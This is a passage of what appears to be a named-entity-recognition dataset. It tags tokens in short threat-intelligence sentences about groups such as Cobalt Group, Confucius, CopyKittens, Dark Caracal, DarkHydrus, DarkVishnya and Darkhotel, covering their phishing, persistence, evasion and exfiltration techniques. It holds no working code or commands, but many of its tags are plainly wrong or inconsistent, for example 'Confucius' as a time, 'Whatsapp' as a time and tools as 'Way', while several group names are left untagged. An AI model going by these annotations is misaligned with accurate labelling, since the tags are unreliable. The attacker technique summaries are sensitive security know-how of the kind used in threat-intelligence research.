"O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "emails", - "with", - "URLs", - "pointing", - "to", - "malicious", - "documents." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "obtained", - "and", - "used", - "a", - "variety", - "of", - "tools", - "including", - "Mimikatz,", - "PsExec,", - "Cobalt", - "Strike,", - "and", - "SDelete." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "Word", - "OLE", - "compound", - "documents", - "with", - "malicious", - "obfuscated", - "VBA", - "macros", - "that", - "will", - "run", - "upon", - "user", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "a", - "JavaScript", - "backdoor", - "that", - "is", - "capable", - "of", - "launching", - "cmd.exe", - "to", - "execute", - "shell", - "commands.", - "The", - "group", - "has", - "used", - "an", - "exploit", - "toolkit", - "known", - "as", - "Threadkit", - "that", - "launches", - ".bat", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "created", - "new", - "services", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "used", - "msxsl.exe", - "to", - "bypass", - "AppLocker", - "and", - "to", - "invoke", - "Jscript", - "code", - "from", - "an", - "XSL", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "a", - "file", - "stealer", - "to", - "steal", - "documents", - "and", - "images", - "with", - "the", - "following", - "extensions:", - "txt,", - "pdf,", - "png,", - "jpg,", - "doc,", - "xls,", - "xlm,", - "odp,", - "ods,", - "odt,", - "rtf,", - "ppt,", - "xlsx,", - "xlsm,", - "docx,", - "pptx,", - "and", - "jpeg." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "exfiltrated", - "stolen", - "files", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "exfiltrated", - "victim", - "data", - "to", - "cloud", - "storage", - "service", - "accounts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerabilities,", - "including", - "CVE-2015-1641,", - "CVE-2017-11882,", - "and", - "CVE-2018-0802." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "a", - "file", - "stealer", - "that", - "checks", - "the", - "Document,", - "Downloads,", - "Desktop,", - "and", - "Picture", - "folders", - "for", - "documents", - "and", - "images", - "with", - "specific", - "extensions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "downloaded", - "additional", - "files", - "and", - "payloads", - "onto", - "a", - "compromised", - "host", - "following", - "initial", - "access." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "lured", - "victims", - "to", - "execute", - "malicious", - "attachments", - "included", - "in", - "crafted", - "spearphishing", - "emails", - "related", - "to", - "current", - "topics." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "lured", - "victims", - "into", - "clicking", - "on", - "a", - "malicious", - "link", - "sent", - "through", - "spearphishing." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "mshta.exe", - "to", - "execute", - "malicious", - "VBScript." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "PowerShell", - "to", - "execute", - "malicious", - "files", - "and", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "dropped", - "malicious", - "files", - "into", - "the", - "startup", - "folder", - "`%AppData%\\Microsoft\\Windows\\Start", - "Menu\\Programs\\Startup`", - "on", - "a", - "compromised", - "host", - "in", - "order", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "created", - "scheduled", - "tasks", - "to", - "maintain", - "persistence", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "crafted", - "and", - "sent", - "victims", - "malicious", - "attachments", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "sent", - "malicious", - "links", - "to", - "victims", - "through", - "email", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "a", - "file", - "stealer", - "that", - "can", - "examine", - "system", - "drives,", - "including", - "those", - "other", - "than", - "the", - "C", - "drive." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "a", - "weaponized", - "Microsoft", - "Word", - "document", - "with", - "an", - "embedded", - "RTF", - "exploit." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "VBScript", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Confucius", - "has", - "obtained", - "cloud", - "storage", - "service", - "accounts", - "to", - "host", - "stolen", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Purp", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CopyKittens", - "encrypts", - "data", - "with", - "a", - "substitute", - "cipher", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CopyKittens", - "uses", - "ZPP,", - "a", - ".NET", - "console", - "program,", - "to", - "compress", - "files", - "with", - "ZIP." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CopyKittens", - "digitally", - "signed", - "an", - "executable", - "with", - "a", - "stolen", - "certificate", - "from", - "legitimate", - "company", - "AI", - "Squared." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "CopyKittens", - "has", - "used", - "<code>-w", - "hidden</code>", - "and", - "<code>-windowstyle", - "hidden</code>", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "CopyKittens", - "has", - "used", - "PowerShell", - "Empire." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "CopyKittens", - "has", - "used", - "the", - "AirVPN", - "service", - "for", - "operational", - "activity." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "CopyKittens", - "uses", - "rundll32", - "to", - "load", - "various", - "tools", - "on", - "victims,", - "including", - "a", - "lateral", - "movement", - "tool", - "named", - "Vminst,", - "Cobalt", - "Strike,", - "and", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CopyKittens", - "has", - "used", - "Metasploit,", - "Empire,", - "and", - "AirVPN", - "for", - "post-exploitation", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "leveraged", - "a", - "compiled", - "HTML", - "file", - "that", - "contained", - "a", - "command", - "to", - "download", - "and", - "run", - "an", - "executable." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "collected", - "complete", - "contents", - "of", - "the", - "'Pictures'", - "folder", - "from", - "compromised", - "Windows", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "leveraged", - "a", - "watering", - "hole", - "to", - "serve", - "up", - "malicious", - "code." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "has", - "obfuscated", - "strings", - "in", - "Bandook", - "by", - "base64", - "encoding,", - "and", - "then", - "encrypting", - "them." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "collected", - "file", - "listings", - "of", - "all", - "default", - "Windows", - "directories." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "makes", - "their", - "malware", - "look", - "like", - "Flash", - "Player,", - "Office,", - "or", - "PDF", - "documents", - "in", - "order", - "to", - "entice", - "a", - "user", - "to", - "click", - "on", - "it." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal's", - "version", - "of", - "Bandook", - "adds", - "a", - "registry", - "key", - "to", - "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "for", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "took", - "screenshots", - "using", - "their", - "Windows", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "has", - "used", - "UPX", - "to", - "pack", - "Bandook." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "spearphished", - "victims", - "via", - "Facebook", - "and", - "Whatsapp." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Org", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "Dark", - "Caracal's", - "version", - "of", - "Bandook", - "communicates", - "with", - "their", - "server", - "over", - "a", - "TCP", - "port", - "using", - "HTTP", - "payloads", - "Base64", - "encoded", - "and", - "suffixed", - "with", - "the", - "string", - "“&&&”." - ], - "ner_tags": [ - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dark", - "Caracal", - "has", - "used", - "macros", - "in", - "Word", - "documents", - "that", - "would", - "download", - "a", - "second", - "stage", - "if", - "executed." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkHydrus", - "used", - "Template", - "Injection", - "to", - "launch", - "an", - "authentication", - "window", - "for", - "users", - "to", - "enter", - "their", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkHydrus", - "has", - "used", - "<code>-WindowStyle", - "Hidden</code>", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DarkHydrus", - "has", - "sent", - "malware", - "that", - "required", - "users", - "to", - "hit", - "the", - "enable", - "button", - "in", - "Microsoft", - "Excel", - "to", - "allow", - "an", - ".iqy", - "file", - "to", - "be", - "downloaded." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkHydrus", - "leveraged", - "PowerShell", - "to", - "download", - "and", - "execute", - "additional", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkHydrus", - "has", - "sent", - "spearphishing", - "emails", - "with", - "password-protected", - "RAR", - "archives", - "containing", - "malicious", - "Excel", - "Web", - "Query", - "files", - "(.iqy).", - "The", - "group", - "has", - "also", - "sent", - "spearphishing", - "emails", - "that", - "contained", - "malicious", - "Microsoft", - "Office", - "documents", - "that", - "use", - "the", - "“attachedTemplate”", - "technique", - "to", - "load", - "a", - "template", - "from", - "a", - "remote", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkHydrus", - "used", - "an", - "open-source", - "tool,", - "Phishery,", - "to", - "inject", - "malicious", - "remote", - "template", - "URLs", - "into", - "Microsoft", - "Word", - "documents", - "and", - "then", - "sent", - "them", - "to", - "victims", - "to", - "enable", - "Forced", - "Authentication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "DarkHydrus", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz,", - "Empire,", - "and", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "brute-force", - "attack", - "to", - "obtain", - "login", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "Bash", - "Bunny,", - "Raspberry", - "Pi,", - "netbooks", - "or", - "inexpensive", - "laptops", - "to", - "connect", - "to", - "the", - "company’s", - "local", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "performed", - "port", - "scanning", - "to", - "obtain", - "the", - "list", - "of", - "active", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "scanned", - "the", - "network", - "for", - "public", - "shared", - "folders." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "network", - "sniffing", - "to", - "obtain", - "login", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "ports", - "5190", - "and", - "7900", - "for", - "shellcode", - "listeners,", - "and", - "4444,", - "4445,", - "31337", - "for", - "shellcode", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "PowerShell", - "to", - "create", - "shellcode", - "loaders." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "used", - "DameWare", - "Mini", - "Remote", - "Control", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkVishnya", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Impacket,", - "Winexe,", - "and", - "PsExec." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkVishnya", - "created", - "new", - "services", - "for", - "shellcode", - "loaders", - "distribution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "code-signing", - "certificates", - "on", - "its", - "malware", - "that", - "are", - "either", - "forged", - "due", - "to", - "weak", - "keys", - "or", - "stolen.", - "Darkhotel", - "has", - "also", - "stolen", - "certificates", - "and", - "signed", - "backdoors", - "and", - "downloaders", - "with", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "decrypted", - "strings", - "and", - "imports", - "using", - "RC4", - "during", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "used", - "embedded", - "iframes", - "on", - "hotel", - "login", - "portals", - "to", - "redirect", - "selected", - "victims", - "to", - "download", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "obfuscated", - "code", - "using", - "RC4,", - "XOR,", - "and", - "RSA." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "exploited", - "Adobe", - "Flash", - "vulnerability", - "CVE-2015-8651", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "malware", - "that", - "searched", - "for", - "files", - "with", - "specific", - "patterns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "first-stage", - "payloads", - "that", - "download", - "additional", - "malware", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "sent", - "spearphishing", - "emails", - "in", - "an", - "attempt", - "to", - "lure", - "users", - "into", - "clicking", - "on", - "a", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "malware", - "that", - "is", - "disguised", - "as", - "a", - "Secure", - "Shell", - "(SSH)", - "tool." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "malware", - "can", - "collect", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "been", - "known", - "to", - "establish", - "persistence", - "by", - "adding", - "programs", - "to", - "the", - "Run", - "Registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel's", - "selective", - "infector", - "modifies", - "executables", - "stored", - "on", - "removable", - "media", - "as", - "a", - "method", - "of", - "spreading", - "across", - "computers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "searched", - "for", - "anti-malware", - "strings", - "and", - "anti-virus", - "processes", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "sent", - "spearphishing", - "emails", - "with", - "malicious", - "RAR", - "and", - ".LNK", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "AES-256", - "and", - "3DES", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "malware", - "has", - "used", - "a", - "series", - "of", - "checks", - "to", - "determine", - "if", - "it's", - "being", - "analyzed;", - "checks", - "include", - "the", - "length", - "of", - "executable", - "names,", - "if", - "a", - "filename", - "ends", - "with", - "<code>.Md5.exe</code>,", - "and", - "if", - "the", - "program", - "is", - "executed", - "from", - "the", - "root", - "of", - "the", - "C:\\", - "drive,", - "as", - "well", - "as", - "checks", - "for", - "sandbox-related", - "libraries." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "collected", - "the", - "hostname,", - "OS", - "version,", - "service", - "pack", - "version,", - "and", - "the", - "processor", - "architecture", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "collected", - "the", - "IP", - "address", - "and", - "network", - "adapter", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "malware", - "can", - "obtain", - "system", - "time", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "used", - "a", - "virus", - "that", - "propagates", - "by", - "infecting", - "executables", - "stored", - "on", - "shared", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "used", - "malware", - "that", - "repeatedly", - "checks", - "the", - "mouse", - "cursor", - "position", - "to", - "determine", - "if", - "a", - "real", - "user", - "is", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "malware", - "has", - "employed", - "just-in-time", - "decryption", - "of", - "strings", - "to", - "evade", - "sandbox", - "detection." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Darkhotel", - "has", - "dropped", - "an", - "mspaint.lnk", - 